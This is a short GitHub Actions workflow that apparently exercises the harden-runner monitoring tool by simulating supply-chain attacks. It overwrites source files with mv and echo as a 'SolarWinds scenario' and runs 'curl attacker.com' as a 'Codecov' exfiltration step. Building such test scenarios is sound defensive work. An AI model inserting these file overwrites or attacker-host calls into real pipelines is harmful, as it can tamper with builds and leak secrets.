name: Sample Workflow Main 2
on:
  workflow_dispatch:
jobs:
  build1:
    name: build1
    runs-on: ubuntu-latest
    steps:
      - name: HardenRunner
        uses: step-security/harden-runner@617de1d11dea286f7a53941812f4667f646e72da # main
        with:
          egress-policy: audit

      - name: Code Checkout
        uses: actions/checkout@ee0669bd1cc54295c223e0bb666b733df41de1c5 # v2.7.0
        with:
          fetch-depth: 2

      # SolarWinds Scenario: Overwrite main.go and utility.go
      - name: File Overwrite with mv
        run: |
          code='package main\n\nfunc main(){\nprintln("code added")\n}'
          printf "$code" > main1.go
          mv main1.go main.go
      - name: File Overwrite with echo
        run: echo "//overwritten" > utility.go

      # Codecov Scenario: Exfiltrate data to a malicious endpoint
      - name: Data Exfiltration To Attacker Controller Endpoint
        run: "curl attacker.com  --connect-timeout 5  || true"

      - name: 1 Docker Action ashishkurmi/hello-action
        uses: ashishkurmi/hello-action@c5327f7d9d31e29e58e788cb3c2727f773b3d0c4 # main
        env:
          SLEEPINSECONDS: 5
